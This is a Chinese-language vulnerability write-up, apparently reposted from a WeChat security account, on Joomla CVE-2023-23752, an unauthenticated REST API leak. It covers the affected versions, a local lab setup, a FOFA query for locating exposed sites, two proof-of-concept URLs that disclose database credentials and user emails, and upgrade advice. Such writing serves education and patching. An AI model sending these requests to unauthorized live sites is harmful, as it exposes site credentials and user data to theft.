CVE-2023-23752—Joomla未授权访问Rest API漏洞

原理

Joomla是由Open Source Matters开源组织研发和维护的知名内容管理系统（CMS），它使用PHP语言和MySQL数据库开发，兼容Linux、Windows、MacOSX等多种系统平台。

近日，Joomla官方发布安全公告，修复了Joomla未授权访问漏洞。由于Joomla对Web服务端点缺乏必要的访问限制，未经身份认证的攻击者，可以远程利用此漏洞访问服务器REST API接口，造成服务器敏感信息泄露。

受影响版本

4.0.0<=Joomla<=4.2.7

漏洞环境

资产搜索 "Joomla"

fofa语句 product="Joomla"

也可搭建环境

Windows +phpstudy

去官网下载Joomla

https://www.joomlachina.cn

用phpstudy搭建，将文件放入phpstudy的WWW目录下，开启Web服务访问：

http：//127.0.0.1/Joomla

然后进行系统安装（安装时注意数据库的账号和密码需与小皮的保持一致）

系统安装成功后，登入界面

漏洞复现

验证POC

http：//127.0.0.1/Joomla/api/index.php/v1/config/application?public=true

http://127.0.0.1/Joomla/api/index.php/v1/users?public=true

回显出账号和密码

v1/config/application

此API用于获取网站最重要的配置信息，包括数据的账号和密码

/v1/users

此API用于获取网站用户名及邮箱账号

Joomla有3个路由入口

1.根目录的index.php(用户访问）

2.根目录的administrator/index.php(管理员）

3.根目录的api/index.php(Rest API），这个存在未授权，影响的版本有4.0.0—4.2.7

修复建议

目前，Joomla官方已发布新版本修复该漏洞，CNVD建议受影响的单位和用户立即升级至4.2.8及以上版本：

https://downloads.joomla.org/https://github.com/joomla/joomla-cms/releases/tag/4.2.8

本文参考来源

https://www.cnvd.org.cn/webinfo/show/8601https://blog.csdn.net/szgyunyun/article/details/129584666

公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（巢安实验室）：CVE-2023-23752—Joomla未授权访问Rest API漏洞